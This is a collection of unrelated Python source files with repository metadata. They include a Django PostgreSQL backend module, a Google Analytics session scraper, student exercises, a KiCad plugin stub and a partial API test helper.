for y in range(foodGrid.height):
if foodGrid[x][y]:
length = getDistance(position, (x, y), problem.startingGameState)
value = length if value < length else value
return value
|
[
"blueice-thu@outlook.com"
] |
blueice-thu@outlook.com
|
b301691a347e993eeb0904ec4da555a684042612
|
caf39133030e9e9d9240769fbfe72287009c6b51
|
/math/0x02-calculus/17-integrate.py
|
70e1a9c8db0993bc659e0d727a1f9eab6e7a5be6
|
[] |
no_license
|
sazad44/holbertonschool-machine_learning
|
d08facbc24582ebcedf9a8607c82b18909fe7867
|
b92e89b980a8f1360a24f4ed5654a2ab0dfac679
|
refs/heads/master
| 2022-11-30T22:32:21.264942
| 2020-08-12T05:25:06
| 2020-08-12T05:25:06
| 280,286,486
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 728
|
py
|
#!/usr/bin/env python3
"""task 17 py function to integrate a polynomial"""
def poly_integral(poly, C=0):
"""py function to calculate integral of poly"""
if not isinstance(
poly,
list
) or len(
poly
) == 0 or not isinstance(
C,
int
):
return None
newPoly = [C]
for c in range(len(poly)):
appVal = poly[c] / (c + 1)
if appVal.is_integer():
newPoly.append(int(appVal))
else:
newPoly.append(appVal)
if sum(newPoly) == 0:
return [0]
cutoff = 1
while newPoly[-cutoff] == 0:
cutoff += 1
if newPoly[-1] == 0:
newPoly = newPoly[:-(cutoff - 1)]
return newPoly
|
[
"36613205+sazad44@users.noreply.github.com"
] |
36613205+sazad44@users.noreply.github.com
|
bdd9f479c4b2fdd3901be2b45127d857c7560c00
|
60b1c5ab904a773e81d3f817279f9f2f72e15ac6
|
/individual.py
|
be8c4cc2e02443bef755cf708e9a8b67834da694
|
[
"MIT"
] |
permissive
|
n0lley/polycube
|
1dede161444c9f50220e8683742d95468290bdee
|
bc97b81b7455a8682fcd83f198fad437bb3dc4cb
|
refs/heads/master
| 2021-08-07T01:09:05.584330
| 2020-07-28T23:18:28
| 2020-07-28T23:18:28
| 180,885,490
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 242
|
py
|
class INDIVIDUAL:
def __init__(self, *args, **kwargs):
raise NotImplementedError
def mutate(self, *args, **kwargs):
raise NotImplementedError
def evaluate(self, *args, **kwargs):
raise NotImplementedError
|
[
"david.matthews.1@uvm.edu"
] |
david.matthews.1@uvm.edu
|
dc23bbd95004a5f6fa4e5a6ef31d8b013040ba34
|
6874015cb6043d1803b61f8978627ddce64963b4
|
/django/db/backends/postgresql/operations.py
|
0edcf42febaa364b316750501cb20183caacea8e
|
[
"BSD-3-Clause",
"Python-2.0"
] |
permissive
|
yephper/django
|
25fbfb4147211d08ec87c41e08a695ac016454c6
|
cdd1689fb354886362487107156978ae84e71453
|
refs/heads/master
| 2021-01-21T12:59:14.443153
| 2016-04-27T09:51:41
| 2016-04-27T09:51:41
| 56,134,291
| 0
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 11,101
|
py
|
from __future__ import unicode_literals
from psycopg2.extras import Inet
from django.conf import settings
from django.db.backends.base.operations import BaseDatabaseOperations
class DatabaseOperations(BaseDatabaseOperations):
def unification_cast_sql(self, output_field):
internal_type = output_field.get_internal_type()
if internal_type in ("GenericIPAddressField", "IPAddressField", "TimeField", "UUIDField"):
# PostgreSQL will resolve a union as type 'text' if input types are
# 'unknown'.
# http://www.postgresql.org/docs/9.4/static/typeconv-union-case.html
# These fields cannot be implicitly cast back in the default
# PostgreSQL configuration so we need to explicitly cast them.
# We must also remove components of the type within brackets:
# varchar(255) -> varchar.
return 'CAST(%%s AS %s)' % output_field.db_type(self.connection).split('(')[0]
return '%s'
def date_extract_sql(self, lookup_type, field_name):
# http://www.postgresql.org/docs/current/static/functions-datetime.html#FUNCTIONS-DATETIME-EXTRACT
if lookup_type == 'week_day':
# For consistency across backends, we return Sunday=1, Saturday=7.
return "EXTRACT('dow' FROM %s) + 1" % field_name
else:
return "EXTRACT('%s' FROM %s)" % (lookup_type, field_name)
def date_trunc_sql(self, lookup_type, field_name):
# http://www.postgresql.org/docs/current/static/functions-datetime.html#FUNCTIONS-DATETIME-TRUNC
return "DATE_TRUNC('%s', %s)" % (lookup_type, field_name)
def _convert_field_to_tz(self, field_name, tzname):
if settings.USE_TZ:
field_name = "%s AT TIME ZONE %%s" % field_name
params = [tzname]
else:
params = []
return field_name, params
def datetime_cast_date_sql(self, field_name, tzname):
field_name, params = self._convert_field_to_tz(field_name, tzname)
sql = '(%s)::date' % field_name
return sql, params
def datetime_extract_sql(self, lookup_type, field_name, tzname):
field_name, params = self._convert_field_to_tz(field_name, tzname)
sql = self.date_extract_sql(lookup_type, field_name)
return sql, params
def datetime_trunc_sql(self, lookup_type, field_name, tzname):
field_name, params = self._convert_field_to_tz(field_name, tzname)
# http://www.postgresql.org/docs/current/static/functions-datetime.html#FUNCTIONS-DATETIME-TRUNC
sql = "DATE_TRUNC('%s', %s)" % (lookup_type, field_name)
return sql, params
def deferrable_sql(self):
return " DEFERRABLE INITIALLY DEFERRED"
def fetch_returned_insert_ids(self, cursor):
"""
Given a cursor object that has just performed an INSERT...RETURNING
statement into a table that has an auto-incrementing ID, return the
list of newly created IDs.
"""
return [item[0] for item in cursor.fetchall()]
def lookup_cast(self, lookup_type, internal_type=None):
lookup = '%s'
# Cast text lookups to text to allow things like filter(x__contains=4)
if lookup_type in ('iexact', 'contains', 'icontains', 'startswith',
'istartswith', 'endswith', 'iendswith', 'regex', 'iregex'):
if internal_type in ('IPAddressField', 'GenericIPAddressField'):
lookup = "HOST(%s)"
else:
lookup = "%s::text"
# Use UPPER(x) for case-insensitive lookups; it's faster.
if lookup_type in ('iexact', 'icontains', 'istartswith', 'iendswith'):
lookup = 'UPPER(%s)' % lookup
return lookup
def last_insert_id(self, cursor, table_name, pk_name):
# Use pg_get_serial_sequence to get the underlying sequence name
# from the table name and column name (available since PostgreSQL 8)
cursor.execute("SELECT CURRVAL(pg_get_serial_sequence('%s','%s'))" % (
self.quote_name(table_name), pk_name))
return cursor.fetchone()[0]
def no_limit_value(self):
return None
def prepare_sql_script(self, sql):
return [sql]
def quote_name(self, name):
if name.startswith('"') and name.endswith('"'):
return name # Quoting once is enough.
return '"%s"' % name
def set_time_zone_sql(self):
return "SET TIME ZONE %s"
def sql_flush(self, style, tables, sequences, allow_cascade=False):
if tables:
# Perform a single SQL 'TRUNCATE x, y, z...;' statement. It allows
# us to truncate tables referenced by a foreign key in any other
# table.
tables_sql = ', '.join(
style.SQL_FIELD(self.quote_name(table)) for table in tables)
if allow_cascade:
sql = ['%s %s %s;' % (
style.SQL_KEYWORD('TRUNCATE'),
tables_sql,
style.SQL_KEYWORD('CASCADE'),
)]
else:
sql = ['%s %s;' % (
style.SQL_KEYWORD('TRUNCATE'),
tables_sql,
)]
sql.extend(self.sequence_reset_by_name_sql(style, sequences))
return sql
else:
return []
def sequence_reset_by_name_sql(self, style, sequences):
# 'ALTER SEQUENCE sequence_name RESTART WITH 1;'... style SQL statements
# to reset sequence indices
sql = []
for sequence_info in sequences:
table_name = sequence_info['table']
column_name = sequence_info['column']
if not (column_name and len(column_name) > 0):
# This will be the case if it's an m2m using an autogenerated
# intermediate table (see BaseDatabaseIntrospection.sequence_list)
column_name = 'id'
sql.append("%s setval(pg_get_serial_sequence('%s','%s'), 1, false);" %
(style.SQL_KEYWORD('SELECT'),
style.SQL_TABLE(self.quote_name(table_name)),
style.SQL_FIELD(column_name))
)
return sql
def tablespace_sql(self, tablespace, inline=False):
if inline:
return "USING INDEX TABLESPACE %s" % self.quote_name(tablespace)
else:
return "TABLESPACE %s" % self.quote_name(tablespace)
def sequence_reset_sql(self, style, model_list):
from django.db import models
output = []
qn = self.quote_name
for model in model_list:
# Use `coalesce` to set the sequence for each model to the max pk value if there are records,
# or 1 if there are none. Set the `is_called` property (the third argument to `setval`) to true
# if there are records (as the max pk value is already in use), otherwise set it to false.
# Use pg_get_serial_sequence to get the underlying sequence name from the table name
# and column name (available since PostgreSQL 8)
for f in model._meta.local_fields:
if isinstance(f, models.AutoField):
output.append(
"%s setval(pg_get_serial_sequence('%s','%s'), "
"coalesce(max(%s), 1), max(%s) %s null) %s %s;" % (
style.SQL_KEYWORD('SELECT'),
style.SQL_TABLE(qn(model._meta.db_table)),
style.SQL_FIELD(f.column),
style.SQL_FIELD(qn(f.column)),
style.SQL_FIELD(qn(f.column)),
style.SQL_KEYWORD('IS NOT'),
style.SQL_KEYWORD('FROM'),
style.SQL_TABLE(qn(model._meta.db_table)),
)
)
break # Only one AutoField is allowed per model, so don't bother continuing.
for f in model._meta.many_to_many:
if not f.remote_field.through:
output.append(
"%s setval(pg_get_serial_sequence('%s','%s'), "
"coalesce(max(%s), 1), max(%s) %s null) %s %s;" % (
style.SQL_KEYWORD('SELECT'),
style.SQL_TABLE(qn(f.m2m_db_table())),
style.SQL_FIELD('id'),
style.SQL_FIELD(qn('id')),
style.SQL_FIELD(qn('id')),
style.SQL_KEYWORD('IS NOT'),
style.SQL_KEYWORD('FROM'),
style.SQL_TABLE(qn(f.m2m_db_table()))
)
)
return output
def prep_for_iexact_query(self, x):
return x
def max_name_length(self):
"""
Returns the maximum length of an identifier.
Note that the maximum length of an identifier is 63 by default, but can
be changed by recompiling PostgreSQL after editing the NAMEDATALEN
macro in src/include/pg_config_manual.h .
This implementation simply returns 63, but can easily be overridden by a
custom database backend that inherits most of its behavior from this one.
"""
return 63
def distinct_sql(self, fields):
if fields:
return 'DISTINCT ON (%s)' % ', '.join(fields)
else:
return 'DISTINCT'
def last_executed_query(self, cursor, sql, params):
# http://initd.org/psycopg/docs/cursor.html#cursor.query
# The query attribute is a Psycopg extension to the DB API 2.0.
if cursor.query is not None:
return cursor.query.decode('utf-8')
return None
def return_insert_id(self):
return "RETURNING %s", ()
def bulk_insert_sql(self, fields, placeholder_rows):
placeholder_rows_sql = (", ".join(row) for row in placeholder_rows)
values_sql = ", ".join("(%s)" % sql for sql in placeholder_rows_sql)
return "VALUES " + values_sql
def adapt_datefield_value(self, value):
return value
def adapt_datetimefield_value(self, value):
return value
def adapt_timefield_value(self, value):
return value
def adapt_ipaddressfield_value(self, value):
if value:
return Inet(value)
return None
def subtract_temporals(self, internal_type, lhs, rhs):
if internal_type == 'DateField':
lhs_sql, lhs_params = lhs
rhs_sql, rhs_params = rhs
return "age(%s, %s)" % (lhs_sql, rhs_sql), lhs_params + rhs_params
return super(DatabaseOperations, self).subtract_temporals(internal_type, lhs, rhs)
|
[
"smileszzh@163.com"
] |
smileszzh@163.com
|
b08dd544b2f32a4764ba76171b76226e77090569
|
2628f51ef7ab5aae691dc72556ab312cc5b2a876
|
/venv/lib/python3.8/site-packages/unyt/_version.py
|
c41cbda0701c4538c26555538502bd76e89985b4
|
[
"BSD-3-Clause"
] |
permissive
|
Jack-kelly-22/ps-4
|
f933a8bb7bf5c865d846a30a5e0c8352c448a18d
|
fbbf327f1717bbd1902f437147640dfdf6aa118c
|
refs/heads/master
| 2023-02-10T23:56:48.499720
| 2021-01-05T21:43:59
| 2021-01-05T21:43:59
| 327,124,314
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 498
|
py
|
# This file was generated by 'versioneer.py' (0.18) from
# revision-control system data, or from the parent directory name of an
# unpacked source archive. Distribution tarballs contain a pre-generated copy
# of this file.
import json
version_json = '''
{
"date": "2020-10-05T14:17:00-0600",
"dirty": false,
"error": null,
"full-revisionid": "eeefa00a2fddbf0dba6ab854e968ef43e31f851e",
"version": "v2.8.0"
}
''' # END VERSION_JSON
def get_versions():
return json.loads(version_json)
|
[
"Jacklaxjk@gmail.com"
] |
Jacklaxjk@gmail.com
|
b779dffe55d8fb13948ccc43312f57df7c9b48af
|
987d44772eb85c61deefe2986598903c9e965008
|
/_site/site/performance_dashboard/data/GA/GA_scraper.py
|
46864696a95d0a3d5b6fe1092f9e2c4dbe8719fb
|
[] |
no_license
|
casten4congress/casten4congress.github.io
|
40e92ac86088c941f9180839e6e1b1b8cf3fb837
|
456caaf8503ed63a7903ccf9dc19d23c914a1ca1
|
refs/heads/master
| 2020-03-12T17:32:29.826443
| 2018-07-17T20:39:41
| 2018-07-17T20:39:41
| 130,738,470
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 7,429
|
py
|
import json
from apiclient.discovery import build
from oauth2client.service_account import ServiceAccountCredentials
municipalities_list = ['Bartlett', 'Palatine', 'Lisle', 'Lakewood', 'Winfield', 'Carol Stream', 'Downers Grove', 'Westmont', 'Kildeer', 'Glen Ellyn', 'Burr Ridge', 'Long Grove', 'Barrington Hills', 'Wayne', 'Naperville', 'Forest Lake', 'Trout Valley', 'Rolling Meadows', 'Inverness', 'Clarendon Hills', 'St. Charles', 'South Barrington', 'Deer Park', 'Algonquin', 'Hoffman Estates', 'Wheaton', 'Lombard', 'Lake Zurich', 'Port Barrington', 'Hawthorn Woods', 'East Dundee', 'Fox River Grove', 'Lake in the Hills', 'Crystal Lake', 'Darien', 'Oakwood Hills', 'West Dundee', 'Oakbrook Terrace', 'Sleepy Hollow', 'Hinsdale', 'South Elgin', 'Lake Barrington', 'Gilberts', 'Tower Lakes', 'Cary', 'Willowbrook', 'North Barrington', 'Carpentersville', 'Oak Brook', 'Warrenville', 'Elgin', 'Willowbrook', 'West Chicago', 'Barrington']
SCOPES = ['https://www.googleapis.com/auth/analytics.readonly']
SERVICE_ACCOUNT_EMAIL = 'ejerzyk@phonic-server-203118.iam.gserviceaccount.com'
KEY_FILE_LOCATION = 'client_secrets.json'
VIEW_ID = '154261248'
def initialize_analyticsreporting():
"""Initializes an Analytics Reporting API V4 service object.
Returns:
An authorized Analytics Reporting API V4 service object.
"""
credentials = ServiceAccountCredentials.from_json_keyfile_name(
KEY_FILE_LOCATION, SCOPES)
# Build the service object.
analytics = build('analyticsreporting', 'v4', credentials=credentials)
return analytics
def get_report(analytics, dims, dateranges):
"""Queries the Analytics Reporting API V4.
Args:
analytics: An authorized Analytics Reporting API V4 service object.
Returns:
The Analytics Reporting API V4 response.
"""
return analytics.reports().batchGet(
body={
'reportRequests': [
{
'viewId': VIEW_ID,
'dateRanges': dateranges,
'metrics': [{'expression': 'ga:sessions'}],
'dimensions': [dims]
}]
}
).execute()
def print_response(response):
"""Parses and prints the Analytics Reporting API V4 response.
Args:
response: An Analytics Reporting API V4 response.
"""
printP = False
mun = ''
age = ''
gen = ''
for report in response.get('reports', []):
columnHeader = report.get('columnHeader', {})
dimensionHeaders = columnHeader.get('dimensions', [])
metricHeaders = columnHeader.get('metricHeader', {}).get('metricHeaderEntries', [])
to_return = {}
for row in report.get('data', {}).get('rows', []):
dimensions = row.get('dimensions', [])
dateRangeValues = row.get('metrics', [])
for header, dimension in zip(dimensionHeaders, dimensions):
print header + ": " + dimension
if header=='ga:city' and dimension in municipalities_list:
mun = dimension
printP = True
elif header=='ga:userGender': gen = dimension
elif header=='ga:userAgeBracket': age = dimension
for i, values in enumerate(dateRangeValues):
for metricHeader, value in zip(metricHeaders, values.get('values')):
value = int(value)
if printP:
if gen!='' and age!='':
if mun in to_return.keys():
if age in to_return[mun].keys(): to_return[mun][age][gen] = value
else: to_return[mun] = {age: {gen: value}}
else: to_return[mun] = {age: {gen: value}}
elif gen!='':
if mun in to_return.keys(): to_return[mun][gen] = value
else: to_return[mun] = {gen: value}
elif age!='':
if mun in to_return.keys(): to_return[mun][age] = value
else: to_return[mun] = {age: value}
else: to_return[mun] = value
return to_return
def LA(dateranges):
analytics = initialize_analyticsreporting()
response = get_report(analytics, [{'name': 'ga:city'}, {'name':'ga:userAgeBracket'}], dateranges)
d = print_response(response)
total_18_24 = 0
total_25_34 = 0
total_35_44 = 0
total_45_54 = 0
total_55_64 = 0
total_65 = 0
for city in d.keys():
print city
total_18_24 += int(d[city].get('18-24',0))
total_25_34 += int(d[city].get('25-34',0))
total_35_44 += int(d[city].get('35-44',0))
total_45_54 += int(d[city].get('45-54',0))
total_55_64 += int(d[city].get('55-64',0))
total_65 += int(d[city].get('65+',0))
for city in d.keys():
d[city]['18-24'] = float(d[city].get('18-24',0))/total_18_24
d[city]['25-34'] = float(d[city].get('25-34',0))/total_25_34
d[city]['35-44'] = float(d[city].get('35-44',0))/total_35_44
d[city]['45-54'] = float(d[city].get('45-54',0))/total_45_54
d[city]['55-64'] = float(d[city].get('55-64',0))/total_55_64
d[city]['65+'] = float(d[city].get('65+',0))/total_65
for city in municipalities_list:
if city not in d.keys():
d[city] = {}
d[city]['18-24'] = 0
d[city]['25-34'] = 0
d[city]['35-44'] = 0
d[city]['45-54'] = 0
d[city]['55-64'] = 0
d[city]['65+'] = 0
return d
def LG(dateranges):
analytics = initialize_analyticsreporting()
response = get_report(analytics, [{'name': 'ga:city'}, {'name':'ga:userGender'}], dateranges)
d = print_response(response)
total_female = 0
total_male = 0
for city in d.keys():
total_female = total_female + d[city].get('female',0)
total_male = total_male + d[city].get('male',0)
for city in d.keys():
d[city]['female'] = float(d[city].get('female',0))/total_female
d[city]['male'] = float(d[city].get('male',0))/total_male
for city in municipalities_list:
if city not in d.keys():
d[city] = {}
d[city]['female'] = 0
d[city]['male'] = 0
return d
def L(dateranges):
analytics = initialize_analyticsreporting()
response = get_report(analytics, [{'name': 'ga:city'}],dateranges)
d = print_response(response)
total = 0
for city in d.keys(): total = total + d[city]
for city in d.keys(): d[city] = float(d[city])/total
for city in municipalities_list:
if city not in d.keys(): d[city] = 0
return d
def main():
# LA
output_filename = 'LA.js'
d = {'1mo': LA([{'startDate': '2018-04-08', 'endDate': 'today'}]), '3mo': LA([{'startDate': '2018-02-08', 'endDate': 'today'}]), '1yr': LA([{'startDate': '2017-05-08', 'endDate': 'today'}])}
output_f = open(output_filename, 'w')
output_f.write("var la = " + json.dumps(d) + ";")
output_f = open(output_filename + 'on', 'w')
output_f.write(json.dumps(d))
# LG
output_filename = 'LG.js'
d = {'1mo': LG([{'startDate': '2018-04-08', 'endDate': 'today'}]), '3mo': LG([{'startDate': '2018-02-08', 'endDate': 'today'}]), '1yr': LG([{'startDate': '2017-05-08', 'endDate': 'today'}])}
output_f = open(output_filename, 'w')
output_f.write("var lg = " + json.dumps(d) + ";")
output_f = open(output_filename + 'on', 'w')
output_f.write(json.dumps(d))
# L
output_filename = 'L.js'
d = {'1mo': L([{'startDate': '2018-04-08', 'endDate': 'today'}]), '3mo': L([{'startDate': '2018-02-08', 'endDate': 'today'}]), '1yr': L([{'startDate': '2017-05-08', 'endDate': 'today'}])}
output_f = open(output_filename, 'w')
output_f.write("var l = " + json.dumps(d) + ";")
output_f = open(output_filename + 'on', 'w')
output_f.write(json.dumps(d))
if __name__ == '__main__':
main()
|
[
"ejerzyk@gmail.com"
] |
ejerzyk@gmail.com
|
a2db15dc70256c5ac16e2d712ccd8393faf996ac
|
c820e028be4239bc20e76af41574e561ba8d8e02
|
/gsw/version.py
|
2f5fd65dfc4d9ab9ae7c7b3df560f34efabacd78
|
[
"MIT"
] |
permissive
|
lukecampbell/python-gsw
|
7657c2e3a0dbadad00ff17557f4ca45f971f3964
|
c555921b5f1fcbc1c1a3565172b946f782d15db4
|
refs/heads/master
| 2016-09-06T16:54:47.074484
| 2013-02-20T20:00:03
| 2013-02-20T20:00:03
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 43
|
py
|
#!/usr/bin/env python
version = '3.0.1a1'
|
[
"luke.s.campbell@gmail.com"
] |
luke.s.campbell@gmail.com
|
ab523c3751accac0cb2820f8f76621d3ca5474ab
|
53fab060fa262e5d5026e0807d93c75fb81e67b9
|
/backup/user_172/ch88_2020_05_06_12_07_01_120079.py
|
65c8bdbe203ac21abf9a6631e62483803e27d184
|
[] |
no_license
|
gabriellaec/desoft-analise-exercicios
|
b77c6999424c5ce7e44086a12589a0ad43d6adca
|
01940ab0897aa6005764fc220b900e4d6161d36b
|
refs/heads/main
| 2023-01-31T17:19:42.050628
| 2020-12-16T05:21:31
| 2020-12-16T05:21:31
| 306,735,108
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 344
|
py
|
class Retangulo:
def _init_(self,coord1, coord2):
coord1 = Ponto(x1, y1)
coord2 = Ponto(x2, y2)
def calcula_perimetro(self):
base = x2 - x1
altura = y2 - y1
p = 2*base + 2*altura
def calcula_area(self):
base = x2 - x1
altura = y2 - y1
a = base*altura
|
[
"you@example.com"
] |
you@example.com
|
6e366b23ce962f4acf818615c993eb9f30b28562
|
d8f44692c9f9f0a9a391a49db0f4f659a2ef6fe8
|
/jsBuilds/jsSupport.py
|
4817320de831b302adb53f3eddacb01f0fbe8e4b
|
[
"MIT"
] |
permissive
|
skylarkgit/sql2phpclass
|
045e71963574b719313fc98882f5c710435f101f
|
a79e7f3cfda8cb41ba00e8cbba0de33e9be759d6
|
refs/heads/master
| 2020-03-19T02:34:34.229287
| 2018-07-04T18:58:28
| 2018-07-04T18:58:28
| 135,640,687
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 759
|
py
|
import sys
sys.path.append('..')
from jsBuilds.jsTemplates import *
def args(varList):
return ','.join(varList)
def reqData(varList):
return '+"&"+'.join('"'+x+'="obj.'+x for x in varList)
def objFormation(varlist):
return ','.join(x+':'+SCOPE(x) for x in varList)
def varsToAliasArr(varList):
arr={}
for v in varList.values():
arr[v.alias]=v
return arr
def createObjFromScope(varList):
return '{'+(','.join(v.alias+":"+PARSER(v.validType,SCOPE(v.alias)) for v in varList.values()))+'}'
def responseToScope(varList):
return ''.join(SCOPE(v.alias)+"=response.data.data."+v.alias+";" for v in varList.values())
def argsToScope(varList):
return ''.join(SCOPE(v.alias)+"="+v.alias+";" for v in varList.values())
|
[
"abhay199658@gmail.com"
] |
abhay199658@gmail.com
|
a564fadbeb8da66f7e99e8a1c5af6eec0923b3f2
|
5160cd2cf1ff8aa1d48935a783ba39e59f8d9ca7
|
/src/py.py
|
bbfff52bf7a351f5fc2d85e6364080af152fd517
|
[] |
no_license
|
harry-uglow/BananaBeats
|
eb9df6f9458e1d12a406f0d96dbe9980f278af6e
|
2e0eb211f5646be5675237c5c1c70d2feed8c57f
|
refs/heads/master
| 2021-01-19T12:47:57.520881
| 2017-08-29T20:36:19
| 2017-08-29T20:36:19
| 100,810,285
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,279
|
py
|
import subprocess
import threading
import sys
import time
import pygame
import os
import signal
import python.adafruit_libraries.Adafruit_MPR121.MPR121 as MPR121
print('strt')
p = subprocess.Popen(['./main'], stdin = subprocess.PIPE, close_fds=True, shell=True)
# Maybe add shell=True if it doesn't work
print('mon')
monitorInputs()
def monitorInputs():
# Create MPR121 instance
device = MPR121.MPR121()
if not device.begin():
sys.exit(1)
pygame.mixer.pre_init(44100, -16, 12, 2048)
pygame.init()
# Main loop to play the corroect sound every time a pin is touched
last_touched = device.touched()
while True:
current_touched = device.touched()
for i in range(12):
pin_bit = 1 << i
if current_touched & pin_bit and not last_touched & pin_bit:
p.stdin.write('t' + i + '\n')
print('t' + i)
p.stdin.flush()
print('Pin ', i, ' touched') # Get rid of this?
if not current_touched & pin_bit and last_touched & pin_bit:
p.stdin.write('r' + i + '\n')
p.stdin.flush() # Get rid of this?
print('Pin ', i, ' released')
last_touched = current_touched
time.sleep(0.1)
|
[
"mauriceyap@hotmail.co.uk"
] |
mauriceyap@hotmail.co.uk
|
420fab0c05381289bc6cac20833db699a61ff63b
|
b883802b374515f7bb453f9631a65bb63b5cd8cc
|
/filter.py
|
6e03457e43b34ee541ab28f736a0550bd1d99d3e
|
[] |
no_license
|
Harry-Yao/learn-about-python
|
6898cae04f665400ab255989b9d8c1388cb94362
|
558085e0fdd7a4488303c91206b44b353e4b58e7
|
refs/heads/master
| 2021-01-10T17:44:29.301594
| 2016-03-10T16:09:50
| 2016-03-10T16:09:50
| 52,965,207
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 176
|
py
|
# -*- coding: utf-8 -*-
def is_palindrome(n):
if str(n) == str(n)[::-1]:
return str(n)
# 测试:
output = filter(is_palindrome, range(1, 1000))
print(list(output))
|
[
"673441990@qq.com"
] |
673441990@qq.com
|
60c083d45755c5c8515e991f42f96dd819d6e4d5
|
fbbbcfa050612a6242c095060bad774b60fc914d
|
/archive_project/old_version.py
|
184a635253393fb5e1f993b883ce043eb4385aee
|
[] |
no_license
|
MitjaNemec/Kicad_action_plugins
|
79b4fa0fb8fdcb0aba3770f871f0c25bd982bea6
|
f7f2eaa567a7354459e17f108427584fa6a6a8a4
|
refs/heads/master
| 2023-08-29T12:09:48.978854
| 2023-06-15T18:41:08
| 2023-06-15T18:41:08
| 110,839,994
| 406
| 79
| null | 2022-03-31T06:31:07
| 2017-11-15T13:55:47
|
Python
|
UTF-8
|
Python
| false
| false
| 1,473
|
py
|
# -*- coding: utf-8 -*-
# action_replicate_layout.py
#
# Copyright (C) 2018 Mitja Nemec
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston,
# MA 02110-1301, USA.
#
#
import pcbnew
import wx
class OldVersion(pcbnew.ActionPlugin):
"""
Notify user of missing wxpython
"""
def defaults(self):
self.name = "Archive project"
self.category = "Archive project"
self.description = "Archive schematics symbols and 3D models"
def Run(self):
_pcbnew_frame = [x for x in wx.GetTopLevelWindows() if x.GetTitle().lower().startswith('pcbnew')][0]
caption = 'Archive project'
message = "This plugin works with KiCad 5.1 and higher"
dlg = wx.MessageDialog(_pcbnew_frame, message, caption, wx.OK | wx.ICON_INFORMATION)
dlg.ShowModal()
dlg.Destroy()
|
[
"mitja.nemec@fe.uni-lj.si"
] |
mitja.nemec@fe.uni-lj.si
|
a1e59a682c3d21feebcf29921ab2ec3829992fd1
|
de3a062138d3fbdfcf76e09915be553aea450e61
|
/Tests.py
|
2b1454136905d54427a60069f63bcf68cbcf68c4
|
[] |
no_license
|
AlyonaMon/autotests
|
be9d0793ad36f917d7315325c3071042b592207f
|
4457f7f3f5ef65b1b67b08221e43693bf7c742f3
|
refs/heads/master
| 2021-01-11T18:54:34.717373
| 2016-11-14T21:35:02
| 2016-11-14T21:35:15
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 7,032
|
py
|
# coding=utf-8
import json
import logging
logger = logging.getLogger(__name__)
logging.basicConfig(datefmt='%m/%d/%Y %I:%M:%S %p', filename="msg.log",
format='%(asctime)s %(name)-20s %(levelname)-8s %(message)s', filemode='w')
from xml.etree import ElementTree
import xml.etree.ElementTree as etree
from xml.dom import minidom
from xml.etree.ElementTree import Element, SubElement, Comment
import csv
global response, test_dic_for_case, name_testsuite, name_testcase
def prettify(elem):
rough_string = ElementTree.tostring(elem, 'utf-8')
reparsed = minidom.parseString(rough_string)
return reparsed.toprettyxml(indent=" ")
# def XML_FILE(name_testsuite, name_testcase, m):
# # print name_testcase, name_testsuite
# top = Element('testsuites', name=str(name_testsuite))
# parent = SubElement(top, 'testsuite', name=str(name_testcase))
# # children = [Element('testsuite', name=str(Tests(response)))]
#
# top.extend(parent)
# return prettify(top)
def STATUS_CODE(response):
# print response.status_code
if response.status_code == 200 or response.status_code == 201:
text = "Response code is 200 or 201"
result = True
else:
text = "Response code is " + str(response.status_code)
result = False
text = text + ": " + str(result)
# print result
return text
def STATUS_CODE_NAME(response):
if response.reason == 'OK':
text = "Status code name has string '" + str(response.reason) + "'"
result = True
else:
text = "Status code name '" + str(response.reason) + "'"
result = False
text = text + ": " + str(result)
return text
def RESPONSE_TIME(response):
# if response.elapsed >
time = response.elapsed.total_seconds()
if time < 0.5:
text = "Response time is less than 0.5ms"
result = time
else:
text = "Response time is more than 0.5ms"
result = "False, time is " + str(time)
text = text + ": " + str(result) + "ms"
return text
def CONTENT_TYPE_IS_PRESENT(response):
if response.content != "":
text = "Content type is present"
result = True
else:
text = "Content type is not present"
result = False
text = text + ": " + str(result)
return text
def RESPONSE_HAS_ACCKEY(r):
text = "Access Key present in response "
if "access_key" in r:
result = r["access_key"]
logger.info('Authentication is successful')
logger.info('Access Key present in response: %s', str(result))
text = text + ": " + str(True)
elif "Message" in r:
logger.setLevel(logging.ERROR)
logger.error('Access Key absent in response: %s', str(r))
text = text + ": " + str(False)
else:
logger.setLevel(logging.ERROR)
logger.error('Fails for an paar App key - Access Key')
text = text + ": " + str(False)
# print text
return text
#
# def _is_empty(text):
# return not text or text.isspace()
"""def indent(elem, level=0, tab=' '):
i = '\n' + level * tab
j = i + tab # j = i_n+1
indent_parent = False
if len(elem):
if _is_empty(elem.text):
# Indent before element.
elem.text = j
if _is_empty(elem.tail):
# Indent after element.
elem.tail = i
prev = None
for child in elem:
indent_block = indent(child, level + 1, tab)
if indent_block or len(child) > 1:
# This child or some lower child block should be super-indented.
if len(elem) == 1:
# Pass indentation up because this level only has one child.
indent_parent = True
else:
# Surround this block with newlines for emphasis.
if prev is not None and _is_empty(prev.tail):
prev.tail = '\n' + j
if _is_empty(child.tail):
child.tail = '\n' + j
prev = child
if _is_empty(child.tail):
# Last child element determines closing tag tab level.
child.tail = i
else:
if level and _is_empty(elem.tail):
elem.tail = i
return indent_parent"""
def Tests(response, test_dic_for_case, name_testcase, top):
parent = SubElement(top, 'testsuite', name=str(name_testcase))
if "STATUS_CODE" in test_dic_for_case:
m = STATUS_CODE(response)
children = SubElement(parent, 'testcase', name=str(m))
if "False" in m:
